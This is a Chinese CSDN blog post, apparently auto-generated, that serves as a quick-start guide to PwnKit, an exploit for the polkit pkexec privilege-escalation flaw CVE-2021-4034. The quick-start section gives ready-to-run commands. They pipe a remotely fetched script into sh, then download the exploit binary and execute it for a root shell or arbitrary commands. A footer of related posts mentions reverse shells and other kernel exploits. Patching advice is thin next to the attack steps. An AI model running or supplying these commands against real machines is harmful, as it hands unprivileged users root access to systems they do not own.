PwnKit 项目使用教程

最新推荐文章于 2024-08-29 21:07:24 发布
最新推荐文章于 2024-08-29 21:07:24 发布
阅读量383 收藏 4
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00296/article/details/141075493
版权

PwnKit 项目使用教程

PwnKitPwnKit: 一个独立的漏洞利用工具,用于利用CVE-2021-4034(Pkexec本地权限提升漏洞)。项目地址:https://gitcode.com/gh_mirrors/pw/PwnKit

项目介绍

PwnKit 是一个针对 CVE-2021-4034 漏洞的自包含本地权限提升漏洞利用工具。该漏洞存在于 Polkit 的 pkexec 程序中,允许非特权用户提升至 root 权限。PwnKit 项目提供了一个简单易用的脚本,可以在受影响的 Linux 发行版上快速执行权限提升。

项目快速启动

快速启动步骤

  1. 克隆项目仓库

    git clone https://github.com/ly4k/PwnKit.git
cd PwnKit

  2. 运行漏洞利用脚本

    sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

  3. 手动运行漏洞利用脚本

    curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit # 交互式 shell
./PwnKit 'id' # 单个命令

应用案例和最佳实践

应用案例

PwnKit 主要用于安全研究人员和系统管理员在受影响的系统上进行漏洞测试和安全评估。通过模拟攻击,可以验证系统的安全性并及时修补漏洞。

最佳实践

  1. 定期更新系统:确保系统和所有软件包都是最新的,以防止已知漏洞被利用。
  2. 安全审计:定期对系统进行安全审计,检查是否存在未授权的权限提升漏洞。
  3. 权限管理:严格控制用户权限,避免非特权用户访问敏感资源。

典型生态项目

PwnKit 作为漏洞利用工具,与以下安全相关的生态项目紧密相关:

  1. Polkit:PwnKit 针对的是 Polkit 中的 pkexec 程序漏洞,因此 Polkit 的更新和安全补丁对防止此类漏洞至关重要。
  2. Qualys:Qualys 的安全研究团队发现了 CVE-2021-4034 漏洞,并提供了详细的技术细节和修补建议。
  3. GitHub Security Lab:GitHub 的安全实验室提供了大量的安全工具和资源,帮助开发者和系统管理员提高系统的安全性。

通过以上模块的介绍,您可以全面了解 PwnKit 项目的基本情况和使用方法,以及如何在实际应用中进行安全管理和漏洞修补。

PwnKitPwnKit: 一个独立的漏洞利用工具,用于利用CVE-2021-4034(Pkexec本地权限提升漏洞)。项目地址:https://gitcode.com/gh_mirrors/pw/PwnKit

霍妲思
关注
红队内网攻防渗透:内网渗透之Linux内网权限提升技术:Dirtycow内核&Pwnkit&DirtyPipe&CVE-2023-0386
HACKONE的博客
06-02 729
Exploit运行的过程中,它会在/tmp目录下创建一个SUID文件,用来提升权限。如图所示,已提升至root权限。缺少fuse.h,是缺少libfuse-dev依赖库导致,通过apt包管理器安装相应的库。获取到Web权限在Linux服务器上时进行的内核漏洞提权。这里卡死了执行探测脚本,所以需要反弹到msf或者cs。漏洞的使用是有优先级的,黄色的是最优先可以使用的。扫描发现-抓包分析-文件写入-反弹MSF。
pwnkit漏洞分析-CVE-2021-4034
pythonxxoo的博客
02-01 1285
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 研究了一下前段时间的Polkit提权漏洞,里面有很多以前不知道的技巧。漏洞很好用,通杀CENTOS、UBUNTU各版本。 主要是分析这个POC触发原理。POC如下: /* * Proof of Concept for PwnKit: Local Privilege Escal
PWNKIT:Python实现的CVE-2021-4034漏洞利用工具
gitblog_00021的博客
06-15 344
PWNKIT:Python实现的CVE-2021-4034漏洞利用工具 CVE-2021-4034项目地址:https://gitcode.com/gh_mirrors/cve20/CVE-2021-4034 1、项目介绍 PWNKIT,也称为CVE-2021-4034,是一个影响Polkit(原名PolicyKit)的本地权限提升漏洞,允许非特权用户获取root权限。这个开源项目是由一个技术爱...
Web到Linux-内核溢出Pwnkit
最新发布
2401_85783544的博客
08-29 381
复现环境:解压DarkHole.zip,导⼊虚拟机。
探索PwnKit:一款强大的安全研究工具
gitblog_00069的博客
04-10 402
探索PwnKit:一款强大的安全研究工具 PwnKitPwnKit: 一个独立的漏洞利用工具,用于利用CVE-2021-4034(Pkexec本地权限提升漏洞)。项目地址:https://gitcode.com/gh_mirrors/pw/PwnKit 本文将向您介绍开发的开源项目,一个专为安全研究人员和渗透测试人员设计的强大工具。我们将探讨其功能、技术原理和应用场景,以帮助您理解为什么它值得您...
Linux 系统服务漏洞PwnKit 已存在12年,可获得所有主流发布版本的root 权限
smellycat000的专栏
01-26 441
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士所有Linux主流发行版本默认配置的 Polkit pkexec 组件中存在一个漏洞 (CVE-2021-4034),可用于获得完整的系...
推荐开源项目PwnKit——CVE-2021-4034漏洞利用工具
gitblog_00913的博客
08-10 259
推荐开源项目PwnKit——CVE-2021-4034漏洞利用工具 PwnKitPwnKit: 一个独立的漏洞利用工具,用于利用CVE-2021-4034(Pkexec本地权限提升漏洞)。项目地址:https://gitcode.com/gh_mirrors/pw/PwnKit 在网络安全的世界里,发现并修复漏洞是一项至关重要的任务。近日,一个名为PwnKit的开源项目浮出水面,它专为利用CV...
PwnKit】CVE-2021-4034-Linux提权脚本
01-27
Qualys研究团队在polkit的pkexec中发现了内存损坏漏洞,pkexec是一个SUID根程序,默认安装在每个主要Linux发行版上。这个易于利用的漏洞允许任何非特权用户通过在默认配置中利用该漏洞来获得脆弱主机上的完全的root...
java8看不到源码-exploitpack:漏洞利用包-项目
06-04
这些代码可能包括PwnKit、Heartbleed、Shellshock等知名漏洞的Java实现,或者是针对Java特定组件的利用代码,如Java deserialization漏洞。分析这些代码可以帮助我们了解漏洞的本质,学习如何修复它们,同时也能提高...
webshell提权教程
06-12
5. 使用提权工具:有一些开源的提权工具,如Linux下的pwnkit、Windows下的Metasploit等,可以帮助攻击者自动化提权过程。 四、防御Webshell及提权 1. 安全编程:避免SQL注入、文件包含漏洞等常见攻击,对输入数据...
TryHackMe-Pwnkit_CVE-2021-4034
M1n9K1n9的博客
12-23 366
事实上pwnkit我已经用很多次了,感受到了其通用性的强大,我第一次使用它只是一次偶然的了解到,于是便一发不可收拾。那么我们今天就来了解一下原理吧CVE-2021-4034(俗称“Pwnkit”)是一个可怕的 Local Privilege E扩展 (LPE) 漏洞,位于 Linux 操作系统(以及许多其他 *nix 操作系统)上默认安装的“Polkit”包中。
PwnKit 本地权限提升漏洞利用工具指南
gitblog_00288的博客
08-10 382
PwnKit 本地权限提升漏洞利用工具指南 PwnKitPwnKit: 一个独立的漏洞利用工具,用于利用CVE-2021-4034(Pkexec本地权限提升漏洞)。项目地址:https://gitcode.com/gh_mirrors/pw/PwnKit 目录结构及介绍 该项目的主要目录结构及其功能概述如下: LICENSE: 包含了MIT许可证文本,指明代码使用的开源协议。 Makefile...
pwn环境搭建_pwn入门学习(一)—— 环境搭建
weixin_39609670的博客
12-19 306
pwn入门学习(一)—— 环境搭建疫情期间学习技术#中国加油##武汉加油#所用环境为Ubuntu 18.04更换Ubuntu下载镜像源Ubuntu默认下载源在美国,相对速度较慢,可将其下载镜像源更换为国内镜像。清华开源软件镜像站Ubuntu:mirrors.tuna.tsinghua.edu.cn/help/ubuntu/具体操作:(1) 备份源文件cd /etc/aptsudo cp sourc...
探索CVE-2021-4034:PwnKit漏洞详解与利用
gitblog_00091的博客
03-24 397
探索CVE-2021-4034:PwnKit漏洞详解与利用 CVE-2021-4034CVE-2021-4034 1day项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2021-4034 在网络安全领域, CVE(Common Vulnerabilities and Exposures)编号是识别已知安全漏洞的标准。 提供了一个深入研究和理解 CVE-20...
权限提升-Linux系统权限提升篇&内核溢出&辅助项目&Vulnhub&Dirty Pipe&Pwnkit&dirtycow
siu~
03-29 1001
1、Web到Linux-内核溢出-权限认知&信息收集 2、Web到Linux-提权项目-漏洞筛选&配置安全 3、Web到Linux-内核溢出-dirtycow(CVE-2016-5159) 4、Web到Linux-内核溢出-Pwnkit (CVE-2021-4034) 5、Web到Linux-内核溢出-DirtyPipe (CVE-2022-0847) 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
Linux polkit提权漏洞复现
sweelg的博客
02-28 642
目录 PwnKit漏洞描述 PwnKit 漏洞原理 PwnKit漏洞复现 PwnKit漏洞修复 PwnKit漏洞描述 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 PwnKit 漏洞原理 以下是对 PwnKit 漏洞如何工作的解释。 pkexec 的 main() 函数的开
Tomcat靶机渗透
weixin_56306210的博客
12-28 2560
Tomcat靶机渗透
HackTheBox - SolidState Write Up
ak.Gh0st的博客
04-08 228
HackTheBox - SolidState Write Up
Linux提权漏洞CVE-2021-4034及其利用脚本解析
资源摘要信息:"【PwnKit】CVE-2021-4034-Linux提权脚本" 知识点详细说明: 1. 漏洞概述 CVE-2021-4034,也被称为PwnKit,是一个影响广泛且严重安全漏洞,存在于polkit的pkexec工具中。polkit(PolicyKit)是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

霍妲思

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值